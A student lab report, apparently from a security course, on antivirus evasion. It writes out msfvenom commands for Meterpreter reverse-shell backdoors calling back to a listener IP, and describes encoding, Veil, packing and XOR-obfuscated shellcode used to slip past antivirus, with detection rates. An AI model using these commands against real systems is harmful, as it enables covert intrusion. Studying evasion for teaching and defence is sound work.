首页 > 其他分享 >20222412 2024-2025-1 《网络与系统攻防技术》实验三实验报告

20222412 2024-2025-1 《网络与系统攻防技术》实验三实验报告

时间:2024-10-30 18:31:02浏览次数:1  
标签:文件 exe 免杀 20222412 恶意代码 2024 2025 使用

20222412 2024-2025-1 《网络与系统攻防技术》实验三实验报告

1.实验内容

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
  • veil,加壳工具
  • 使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2.实验要求

  • 掌握免杀原理与技术

  • 回答问题

    (1)杀软是如何检测出恶意代码的?

    • 基于特征码的检测:杀毒软件会维护一个病毒库,里面包含了大量已知恶意软件的特征码(通常是一段唯一的字节序列)。当扫描文件时,如果发现文件中包含与病毒库中相匹配的特征码,就会将其标记为恶意代码。
    • 启发式恶意软件检测:这种方法不依赖于特定的特征码,而是通过分析程序的行为、代码结构等特征来判断其是否具有恶意性。如果一个程序的行为或代码结构与已知的恶意软件相似,就会被判定为恶意代码。
    • 基于行为的检测:这种检测方式侧重于监控程序的运行时行为,如文件操作、注册表修改、网络连接等。如果程序表现出可疑的行为,如未经授权的文件访问或修改,就会被标记为恶意代码。

    (2)免杀是做什么?

    • 免杀,是一种使恶意软件能够逃避杀毒软件检测的技术。它通过各种手段改变恶意软件的代码或行为,使其不再符合杀毒软件的检测标准,从而避免被查杀。

    (3)免杀的基本方法有哪些?

    • 修改特征码:通过改变恶意软件中的特定字节序列(特征码),使其不再与杀毒软件的病毒库中的记录相匹配。
    • 加壳:给恶意软件加上一个外壳,使其在运行时先执行外壳代码,再执行恶意代码。这样,杀毒软件就很难直接检测到恶意代码的存在。
    • 编码和加密:对恶意代码进行编码或加密,使其在静态分析时难以被识别。只有在运行时才会解密并执行。
    • 混淆和伪装:通过添加垃圾代码、改变程序结构等方式,使恶意软件的代码变得难以理解,从而增加杀毒软件的检测难度。
    • 利用漏洞:利用操作系统或应用程序的漏洞来执行恶意代码,这些漏洞可能尚未被杀毒软件所知晓或无法有效防御。
    • 社工攻击:通过社会工程学手段诱骗用户关闭杀毒软件或执行恶意软件。

3.实验过程

3.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

3.1.1 使用msf工具生成.exe后门程序

使用指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.191.130 LPORT=2412 -f exe > 20222412_1.exe

生成后门程序,如下。

将生成的后门程序放入virustotal进行评估,查看免杀效果,如下。

可以看到,免杀效果为58/71,以此为基准,与后续进行免杀处理后的文件进行对比
使用指令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.191.130 LPORT=2412 -f exe > 20222412_2.exe

  • -e x86/shikata_ga_nai: 使用 Shikata Ga Nai 编码器对生成的有效载荷进行编码,以提高其绕过防病毒软件的能力。Shikata Ga Nai 是一种多态性编码技术。
  • -b '\x00': 指定需要避免的字节序列,这里表示避免包含空字节(\x00)。这通常用于确保生成的代码在某些环境中能够正确执行。

执行指令如下

进行免杀效果检测,如下。

可以看到被检出的概率为59/71,相比之下,差距不大,由此看以看出,该种加密方式,在现如今效果并不浩。

尝试,对后门程序多次编码,进行测试。指令如下。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.168.191.130 LPORT=2412 -f exe > 20222412_3.exe

此处,使用-i 12表示对其进行12此编码。

再次,检测免杀效果,如下。

可以看到,此时被检出的概率依旧为59/71,由此可以看出,对于多次编码的技术,现阶段已有完善的的防御手段。

3.1.2 使用msf工具生成其他格式后门程序

分别使用指令,生成.jar文件、.php文件、.py文件以及.apk文件作为后门程序,用以测试不同格式下的免杀效果。具体情况如下。

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.191.130 LPORT=2412 -f jar > 20222412.jar

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.191.130 LPORT=2412 x > 20222412.php

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.191.130 LPORT=2412 -f py > 20222412.py

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.191.130 LPORT=2412 x > 20222412.apk

综合以上所有文件格式查杀效果,可以看出,不同格式文件对查杀效果有显著影响,其中.py格式的文件免杀效果最好。

3.1.3 使用veil工具生成后门程序

配置veil,使用以下指令即可安装veil,并配置所需环境

sudo apt -y install veil

usr/share/veil/config/setup.sh --force --silent

进入veil工具界面,使用指令use 1,输入list查看载荷c/meterpreter/rev_tcp对应序号为7.

使用指令use 7,选择载荷c/meterpreter/rev_tcp,并设置接口与ip地址。输入generate生成后门程序如下。

设置完成文件名,可以看到文件所在路径如下。

对该文件进行免杀效果测试,如下。

可以看到,查杀率为44/72,相比于使用msf工具生成的后门程序,查杀概论更低了。

3.1.4 使用加壳的方式实现免杀

使用指令

upx 20222412_1.exe -o 20222412_upx.exe

实现对该文件的压缩加壳。

可以看到查杀率为54/71,相较于未加压缩壳时,提升较小。

使用以下指令对该文件使用加密壳。

将待加密文件放到工作目录下

cp 20222412_1.exe /usr/share/windows-resources/hyperion/

进入工作目录

cd /usr/share/windows-resources/hyperion/

加密文件
wine hyperion.exe -v 20222412_1.exe 20222412_hyp.exe

进行免杀检测,如下。

可以看到相较于压缩壳,加密壳更加难以查杀,但仍然无法有效的免杀。

3.1.5采用 C+shellcode来试图实现免杀

输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.191.130 LPORT=2412 -f c

获取shellcode编码。

使用vi编译器编译文件20222412_c.c,并将生成的shellcode插入该文件。

输入

gcc 20222412_c.c -o 20222412_c.exe

将编译生成的20222411_c.exe文件并传至主机

对该文件进行免杀效果检测。

可以看到使用该项技术可以明显提升免杀成功的概率。

3.2 通过组合应用各种技术实现恶意代码免杀

经查阅多方资料,结合多篇文章,先采用如下免杀技术,用于躲避火绒的查杀。

在使用c和shellcode编码的基础上增加异或操作,具体操作如下。

将msf生成的后门使用如下c程序进行异或操作,编译运行后,将异或后的代码存入202222412_shellcode.txt文件。

可以看到异或后的代码如下。

将异或后的代码插入c程序并编译。

该后门程序上传至VirusTotal检测,可以看到此程序效果极佳。

使用查杀软件查杀,如下。

3.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

将上面逃脱查杀的文件在windows下运行。

这里存在一个问题需要使用工具才能成功运行shellcode_launcher

运行后可以看到msf工具成功与被攻击电脑连接。

4.问题及解决方案

  • 问题:上传到被攻击主机上的绝大多数通过加密后的文件都无法正常运行
  • 问题解决方案:通过查阅资料,可以使用shellcode_launcher工具加载和执行Shellcode的软件或代码片段。

5.学习感悟、思考等

在这次实验中,我深入学习并实践了多种免杀技术,包括使用MSF编码器、Veil-Evasion以及自行编写Shellcode等方法。通过这些工具和技术的组合应用,我成功地实现了恶意代码的免杀效果。在此过程中,我有以下几点心得体会。

在尝试各种免杀技术之前,深入理解每种技术的工作原理是非常重要的。例如,了解特征码是如何被杀毒软件识别的,以及如何通过修改特征码来绕过检测。

理论知识需要通过实际操作来验证。在实验中,我发现有些理论上可行的方法在实践中并不总是有效,这要求我们不断尝试和调整策略。

单一的免杀技术往往容易被杀毒软件识破,而将多种技术组合起来使用则能显著提高免杀成功率。例如,先对Shellcode进行编码处理,再加上壳,最后通过混淆技术进一步伪装。

随着杀毒软件的不断升级,免杀技术也需要不断更新。保持对最新安全动态的关注,及时学习和掌握新的免杀技巧是必要的。

本次使用中第二个任务尤为艰难,因为,我们所使用的是最基本的后门程序生成工具,msf中的绝大多数特征码已经被现代的杀毒软件获取,尤其是加壳,可以从实验中看到,加壳后的文件反而更容易被发现。我所使用的异或操作其实本质上就是改变甚至消除特征码,除我所使用的方法,还有几种思路值得尝试,例如花指令等,但究其根本就是让杀毒软件认不出你的shellcode。

不过上述方法还存在缺陷,对于基于沙盒的免杀技术就比较难以实现,我认为解决思路可以增加任务触发shellcode,但不能是使用例如开机自启动这种比较容易发现的任务。

标签:文件,exe,免杀,20222412,恶意代码,2024,2025,使用
From: https://www.cnblogs.com/wwwyg/p/18516362

相关文章

  • 华为OD机试 E卷 2024|增强的strstr(Python)
    0、关于本专栏&刷题交流群本文收录于专栏【2024华为OD机试真题】,专栏共有上千道OD机试真题,包含详细解答思路、与四种代码实现(Python、Java、C++、JavaScript)。点击文末链接加入【华为OD机试交流qun】,和群友一起刷题备考。刷的越多,考试中遇到原题的概率就越大,永久、实时......
  • (Pr2024)Premiere Pro 软件下载
    目录一、AdobePremierePro发展历史1.1初期阶段1.2专业化阶段1.3创新与升级1.4下载链接二、AdobePremierePro功能介绍2.1视频剪辑与组合2.2调色与音频处理2.3字幕与输出三、AdobePremierePro系统要求3.1最低系统要求一、AdobePremierePro发展......
  • 2025年的高新技术企业认定条件是什么?
    2025年高企认定标准是指高新技术企业认定的一系列具体要求和条件,这些标准涵盖了企业的研发能力、知识产权、科技成果转化率等多个方面。企业需满足包括但不限于注册成立时间、研发投入比例、高新技术产品收入占比等在内的多项指标,以确保其具备持续的创新能力和市场竞争力。了解......
  • 蓝桥杯备赛&学习计划 2024.11—2025.4
    学习计划概览2024年11月到12月-巩固基础,学习基本算法。2025年1月到2月-学习中级算法和数据结构。2025年3月-进阶算法学习和刷题练习。2025年4月-复习重点知识,专注于比赛准备。详细周计划2024年11月:基础知识&基础算法第1-2周:复习基本控制结构(循环、条件语......
  • 2025年计算机专业毕业设计选题推荐 速存
    2025年计算机专业毕业设计选题推荐博主介绍CSDN特邀作者、博客专家、CSDN新星计划导师Java领域优质创作者,荣获“博客之星”称号掘金、华为云、阿里云、InfoQ等平台优质作者专注于Java技术及学生毕业项目实战指导高校教师/讲师,擅长同行交流合作文末获取源码联系方式主要内......
  • 2025年计算机专业毕业设计选题推荐
    2025年计算机专业毕业设计选题推荐博主介绍CSDN特邀作者、博客专家、CSDN新星计划导师Java领域优质创作者,荣获“博客之星”称号掘金、华为云、阿里云、InfoQ等平台优质作者专注于Java技术及学生毕业项目实战指导高校教师/讲师,擅长同行交流合作文末获取源码联系方式主要内......
  • 2024年项目经理必看!项目管理平台如何助力项目成功交付?
    一、项目管理平台的重要性在2024年,项目管理平台对于项目成功交付起着至关重要的作用。首先,项目管理平台能够极大地提高协作效率。例如,像禅道这样的优秀平台,为团队提供了统一的协作空间,成员可以在平台上共享文档、讨论问题、分配任务等。通过这种方式,信息传递更加及时准确,避......
  • 强势建议收藏!2024年工程项目管理平台上的10个高效工具
    一、多功能的禅道禅道作为工程项目管理平台,拥有众多强大功能。在项目管理和协作方面,禅道集成了产品管理、项目管理、质量管理、文档管理、组织管理和事务管理等多方面功能,完整覆盖了工程项目管理的核心流程。通过禅道,团队成员可以清晰地了解项目的各个环节,从需求收集到项目交付......
  • 2024年强势推荐!最经典4款最适合工程项目的免费管理平台
    一、工程项目管理平台的重要性工程项目管理具有复杂性高、周期长、资源要求多样、协调性强等特点。复杂性体现在涉及多个专业领域协同工作,需遵循严格法律法规和标准,且各个阶段都需要详细计划和协调。例如,一个大型工程项目可能需要土木、电气、机械等多个专业人员合作,每个领域都有......
  • 2024年力学、电磁学与近代物理国际学术会议(ICMEMP 2024)
    2024年力学、电磁学与近代物理国际学术会议(ICMEMP2024)2024InternationalConferenceonMechanics,ElectromagneticsandModernPhysics(ICMEMP2024)会议信息大会官网:2024年力学、电磁学与近代物理国际学术会议(ICMEMP2024)投稿邮箱:[email protected]【投稿请备注:ICM......